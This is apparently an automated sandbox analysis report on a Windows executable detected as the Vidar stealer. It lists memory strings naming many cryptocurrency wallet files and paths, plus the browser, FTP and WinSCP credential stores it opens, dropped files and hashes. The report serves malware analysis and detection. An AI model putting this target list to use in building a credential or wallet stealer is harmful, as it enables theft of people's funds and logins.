Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Yara detected Credential Stealer

Source: Yara match	File source: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.27e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.7ZthFNAqYp.exe.920000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.833b9e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.7ZthFNAqYp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 7ZthFNAqYp.exe PID: 6484, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90C40 sqlite3_bind_zeroblob,	2_2_6CB90C40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90D60 sqlite3_bind_parameter_name,	2_2_6CB90D60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB8EA0 sqlite3_clear_bindings,	2_2_6CAB8EA0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CB90B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6CB90B40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB6410 bind,WSAGetLastError,	2_2_6CAB6410
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB60B0 listen,WSAGetLastError,	2_2_6CAB60B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CABC030 sqlite3_bind_parameter_count,	2_2_6CABC030
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB6070 PR_Listen,	2_2_6CAB6070
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CABC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	2_2_6CABC050
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CA422D0 sqlite3_bind_blob,	2_2_6CA422D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe	Code function: 2_2_6CAB63C0 PR_Bind,	2_2_6CAB63C0

Windows Analysis Report
7ZthFNAqYp.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1539807
Product:	CloudBasic
Start time:	07:01:11
Start date:	23.10.2024
Sample:	7ZthFNAqYp.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	6733924c670207ed7755dc0fe2286c36
SHA1:	2fea9c1b0c3b0a923232dbcadcfc661bb08031d0
SHA256:	a555018ed03a0b191f64f625b75cebd9f62c194c7b1c1a66b91266f2f1c1b6c4
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\JJJJEBGDAFHJ\CFCFHJ	ASCII text, with very long lines (1717), with CRLF line terminators	0F58C61DE9618A1B53735181E43EE166	CC45931CF12AF92935A84C2A015786CC810AEC3A	AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
C:\ProgramData\JJJJEBGDAFHJ\CGDHIE	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2	378391FDB591852E472D99DC4BF837DA	10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0	513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
C:\ProgramData\JJJJEBGDAFHJ\DGDAEH	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8	271D5F995996735B01672CF227C81C17	7AEAACD66A59314D1CBF4016038D3A0A956BAF33	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
C:\ProgramData\JJJJEBGDAFHJ\DGDBFB	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1	7B955D976803304F2C0505431A0CF1CF	E29070081B18DA0EF9D98D4389091962E3D37216	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
C:\ProgramData\JJJJEBGDAFHJ\DHCBGD	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	76D181A334D47872CD2E37135CC83F95	B563370B023073CE6E0F63671AA4AF169ABBF4E1	52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
C:\ProgramData\JJJJEBGDAFHJ\DHCBGD-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\JJJJEBGDAFHJ\ECBGCG	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\JJJJEBGDAFHJ\FBFIDB	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\JJJJEBGDAFHJ\FBFIDB-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\ProgramData\JJJJEBGDAFHJ\GDBKJD	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\JJJJEBGDAFHJ\HDAFBA	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6	933D6D14518371B212F36C3835794D75	92D056D912B3C0260D379330D3CC0359B57A322B	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
C:\ProgramData\JJJJEBGDAFHJ\HIJJEG	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1	52701A76A821CDDBC23FB25C3FCA4968	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
C:\ProgramData\JJJJEBGDAFHJ\IJDGII	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	37B1FC046E4B29468721F797A2BB968D	50055EF1C50E4C1A7CCF7D00620E95128E4C448B	7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
